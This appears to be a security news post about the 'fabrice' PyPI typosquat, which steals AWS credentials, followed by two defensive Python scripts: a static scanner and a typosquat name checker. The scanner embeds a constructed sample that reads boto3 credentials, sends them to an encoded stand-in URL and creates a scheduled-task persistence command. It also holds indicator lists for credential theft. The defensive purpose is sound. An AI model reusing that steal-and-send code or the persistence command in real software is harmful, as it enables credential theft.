Three years in plain sight: how a malicious package on PyPI collected 37,000 downloads

Man

The malicious package sat in the dependency trees of thousands of developers for years without being detected.

A team of researchers from Socket has discovered a malicious Python package named "fabrice", a typosquat of the popular "fabric" library. The package has been on PyPI since 2021 and has been downloaded more than 37,000 times; it silently steals AWS credentials from the developers who install it.

The genuine "fabric" library, maintained by bitprophet, is used by specialists worldwide and has more than 200 million downloads. The attackers traded on that trust by publishing a look-alike whose name differs from the original by a single letter and that carries malicious code. The "fabrice" package steals access keys, installs backdoors, and runs commands tailored to the victim's operating system.

On Linux the malicious code runs through a linuxThread() function, which downloads scripts from a remote server and executes them. Downloaded files are kept in a hidden directory, which makes them easy to overlook. The server address is obfuscated, so a plain string search of the package source will not reveal it and signature-based antivirus is less likely to fire.

On Windows the infection goes through a winThread() function, which downloads malicious executables and creates scheduled tasks to run them at regular intervals. The scheduled task gives the attackers persistence: their access survives a reboot.

The main purpose of fabrice is to steal AWS credentials. Using the boto3 library, the malicious code reads whatever keys boto3's default credential chain resolves (environment variables, the shared credentials file, or an attached role) and sends them to a server hosted behind a VPN in Paris. The VPN makes attribution harder, and the stolen keys give the attackers access to the victims' cloud resources.
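The three behaviours described above (boto3 credential access, an outbound connection to an obfuscated address, and OS-specific persistence) can be spotted with a cheap static pass over a package's source before it is ever executed. The following is an added example written for this post, not Socket's tooling and not the fabrice code itself; the SAMPLE string is a constructed stand-in that mimics the described behaviour, and the indicator names are an assumption chosen for illustration.

```python
"""Heuristic static scan for the behaviours the fabrice write-up describes:
AWS credential access via boto3, outbound HTTP, obfuscation, and OS-specific
persistence. Added example; not the real fabrice source or Socket's scanner."""
import ast

# Constructed sample that mimics the described behaviour. It is only parsed,
# never executed, and the base64 string decodes to a harmless .invalid URL.
SAMPLE = '''
import os, platform, base64, urllib.request, boto3

def steal():
    creds = boto3.Session().get_credentials()
    data = (creds.access_key + ":" + creds.secret_key).encode()
    urllib.request.urlopen(base64.b64decode(b"aHR0cDovL2V4YW1wbGUuaW52YWxpZA==").decode(), data)

if platform.system() == "Windows":
    os.system("schtasks /create /sc minute /mo 15 /tn upd /tr pythonw.exe")
'''

# Call names grouped into the categories the write-up describes (assumed
# grouping; extend the sets for the HTTP/shell libraries you care about).
INDICATORS = {
    "aws_credential_access": {"get_credentials"},
    "outbound_http": {"urlopen", "post", "get", "request"},
    "obfuscation": {"b64decode", "unhexlify"},
    "persistence_or_shell": {"system", "Popen", "call", "run"},
}


def scan_source(src: str) -> set:
    """Return the set of indicator categories present in a Python source string."""
    tree = ast.parse(src)
    imports, calls = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Attribute):
                calls.add(func.attr)      # e.g. session.get_credentials()
            elif isinstance(func, ast.Name):
                calls.add(func.id)        # e.g. urlopen(...)
    found = {cat for cat, names in INDICATORS.items() if calls & names}
    if imports & {"boto3", "botocore"}:
        found.add("imports_boto3")
    return found


def looks_like_credential_stealer(found: set) -> bool:
    """Credential read plus network egress in one module is the combination
    that matters; either alone is common in legitimate code."""
    return {"imports_boto3", "aws_credential_access", "outbound_http"} <= found


if __name__ == "__main__":
    hits = scan_source(SAMPLE)
    print(sorted(hits), looks_like_credential_stealer(hits))
```

Run it against the unpacked wheel or sdist of any dependency you are about to trust. The scan is deliberately conservative: a module that only reads credentials (a normal AWS client) or only makes HTTP requests is not flagged; the alert fires when both appear in one file, which is exactly the pattern the article describes.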

To protect themselves, developers are encouraged to use tools that automatically check dependencies and flag suspicious packages, such as Socket's GitHub app, before a new dependency reaches a build. The Socket team has notified PyPI so that the package can be removed. Two practical checks in the meantime: confirm that every requirements file and lockfile names fabric, not fabrice, and rotate any AWS keys that were reachable from a machine that installed the package.
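The cheapest local version of the dependency check recommended above is a name-similarity pass: compare every installed or pinned package name against a list of popular packages and flag anything that is one or two edits away from a well-known name, which is how "fabrice" sits next to "fabric". This is an added example for this post, not Socket's code; the short POPULAR list is a constructed sample (a real check would load a top-N-downloads list), and the function names are assumptions.

```python
"""Flag dependency names that look like typosquats of well-known PyPI packages.
Added example, not Socket's tooling. POPULAR is a constructed sample list."""
import re
from importlib.metadata import distributions

# Constructed sample of well-known names; substitute a top-N list in practice.
POPULAR = {"fabric", "requests", "boto3", "numpy", "urllib3", "paramiko"}


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-insensitive, runs of -_. are one dash."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; insert, delete and substitute each cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def suspicious(names, popular=POPULAR, max_distance=2) -> dict:
    """Map each name that is near, but not equal to, a popular package onto
    the popular name it resembles. Exact matches are trusted and skipped."""
    known = {normalize(p) for p in popular}
    hits = {}
    for raw in names:
        name = normalize(raw)
        if name in known:
            continue
        for target in sorted(known):
            if edit_distance(name, target) <= max_distance:
                hits[raw] = target
                break
    return hits


def audit_installed() -> dict:
    """Check every distribution installed in the current interpreter."""
    return suspicious(dist.metadata["Name"] for dist in distributions())


if __name__ == "__main__":
    for bad, near in audit_installed().items():
        print(f"suspicious: {bad!r} resembles {near!r}")
```

Treat the output as a triage signal rather than a verdict: genuinely related packages (a "boto" next to "boto3") will also land within the distance threshold, so each hit needs a look at the project page and the uploader before anything is removed.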
